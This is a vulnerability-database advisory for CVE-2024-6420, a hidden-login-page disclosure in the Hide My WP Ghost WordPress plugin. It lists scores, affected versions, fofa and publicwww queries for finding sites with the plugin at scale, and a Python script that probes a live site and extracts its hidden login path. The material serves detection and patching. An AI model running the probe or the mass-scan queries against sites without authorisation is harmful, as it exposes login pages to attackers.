cbcvebase.
CVE-2024-6420
published 2024-07-23

CVE-2024-6420: The Hide My WP Ghost WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an…

Priority: P2 (60) · Severity: high · CVSS 3.1 base score: 8.6
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
Exploit

EPSS: 1.80% (75.8th percentile)
The Hide My WP Ghost WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.

Affected (1 range)

Vendor     Product           Version range   Fixed in
wpplugins  hide_my_wp_ghost  < 5.2.02        5.2.02

Detection & IOCs (extracted from sources)

url:   {{BaseURL}}/?gf_page=randomstring
path:  /wp-content/plugins/hide-my-wp
other: %2F%3Fgf_page%3Drandomstring&reauth=1
other: fofa-query: body="/wp-content/plugins/hide-my-wp"
other: publicwww-query: "/wp-content/plugins/hide-my-wp/"
  • Active check: send a GET request to /?gf_page=randomstring without following redirects and inspect the Location header. WordPress's auth_redirect() sends an unauthenticated visitor to the site's login URL with redirect_to set to the URL-encoded original request and reauth=1 appended, so a vulnerable site answers with a Location header containing '%2F%3Fgf_page%3Drandomstring&reauth=1'. Confirm at the same time that the redirect target is NOT the default 'wp-login.php'; if it is, the login page is not hidden and nothing is leaked.
  • Identify candidate WordPress installations by checking for '/wp-content/plugins/hide-my-wp' in the page body, which confirms the Hide My WP Ghost plugin is active. The fofa and publicwww queries above run the same body search at internet scale.
  • A successful exploit results in a redirect Location header that does NOT contain 'wp-login.php': the path in that header is the hidden (custom) login page URL, disclosed to an unauthenticated visitor.
  • The Nuclei template uses a two-step flow: step 1 confirms the plugin is present (internal matcher), and step 2 triggers the auth_redirect leak. Both conditions must be true for a positive detection.
  • The vulnerability only affects Hide My WP Ghost versions strictly before 5.2.02; sites running 5.2.02 or later are not affected.
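The two-step check from the bullets above, as an added example written for this page (it is not the Nuclei template and not the plugin vendor's code): the decision logic is separated from the HTTP calls so it can be exercised offline on constructed responses, and live_check() applies it to a real site. The host wp.example, the path /my-secret-login and the sample body are made up for illustration.

```python
"""
Two-step check for CVE-2024-6420 (Hide My WP Ghost < 5.2.02):
  1. fingerprint the plugin from the page body,
  2. probe /?gf_page=randomstring without following redirects and classify
     the Location header that auth_redirect() produces.
Example code written for this page; not the vendor's code, not the Nuclei template.
"""
import urllib.request
from urllib.parse import parse_qs, unquote, urlsplit

PLUGIN_MARKER = "/wp-content/plugins/hide-my-wp"  # body marker from the IOC list
PROBE_PATH = "/?gf_page=randomstring"             # probe request from the IOC list
DEFAULT_LOGIN = "wp-login.php"                    # where a non-hidden site redirects


def plugin_present(body: str) -> bool:
    """Step 1: passive fingerprint, the same test the fofa/publicwww queries run."""
    return PLUGIN_MARKER in body


def classify_redirect(location):
    """Step 2 decision logic, applied to the Location header of the probe response.

    auth_redirect() sends unauthenticated visitors to wp_login_url() with
    redirect_to=<URL-encoded original request> and reauth=1 appended. When the
    plugin has rewritten the login URL, the redirect target is the hidden page.
    """
    if not location:
        return {"leak": False, "hidden_login_path": None,
                "reason": "no Location header (not redirected)"}
    parts = urlsplit(location)
    query = parse_qs(parts.query)
    # parse_qs already URL-decodes; unquote() is a no-op safety net for double encoding
    from_probe = any(PROBE_PATH in unquote(v) for v in query.get("redirect_to", []))
    reauth = query.get("reauth", []) == ["1"]
    if not (from_probe and reauth):
        return {"leak": False, "hidden_login_path": None,
                "reason": "redirect was not produced by auth_redirect for the probe"}
    if parts.path.lower().endswith(DEFAULT_LOGIN):
        return {"leak": False, "hidden_login_path": None,
                "reason": "redirect goes to the default wp-login.php"}
    return {"leak": True, "hidden_login_path": parts.path,
            "reason": "hidden login page disclosed by auth_redirect"}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Hand back the 3xx response itself instead of following it."""

    def http_error_302(self, req, fp, code, msg, headers):
        return fp

    http_error_301 = http_error_303 = http_error_307 = http_error_308 = http_error_302


def live_check(base_url: str, timeout: float = 10.0) -> dict:
    """Run both steps against a real site (needs network; not exercised offline)."""
    opener = urllib.request.build_opener(_NoRedirect)
    with opener.open(base_url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", "replace")
    if not plugin_present(body):
        return {"leak": False, "hidden_login_path": None,
                "reason": "Hide My WP Ghost marker not found in body"}
    with opener.open(base_url.rstrip("/") + PROBE_PATH, timeout=timeout) as resp:
        return classify_redirect(resp.headers.get("Location"))


# Constructed sample data (not captured from a real site) so the logic runs offline.
SAMPLE_BODY = '<link rel="stylesheet" href="/wp-content/plugins/hide-my-wp/public/css/style.css">'
SAMPLE_LEAK = ("https://wp.example/my-secret-login"
               "?redirect_to=https%3A%2F%2Fwp.example%2F%3Fgf_page%3Drandomstring&reauth=1")
SAMPLE_DEFAULT = ("https://wp.example/wp-login.php"
                  "?redirect_to=https%3A%2F%2Fwp.example%2F%3Fgf_page%3Drandomstring&reauth=1")

if __name__ == "__main__":
    print("plugin present:", plugin_present(SAMPLE_BODY))
    for loc in (SAMPLE_LEAK, SAMPLE_DEFAULT, None):
        print(classify_redirect(loc))
```

Matching on the decoded redirect_to value rather than on the raw substring '%2F%3Fgf_page%3Drandomstring' keeps the check correct when the redirect_to value carries the full scheme and host (which is what auth_redirect() builds) or when the server re-encodes it; the wp-login.php test is what separates a genuine leak from an ordinary WordPress login redirect.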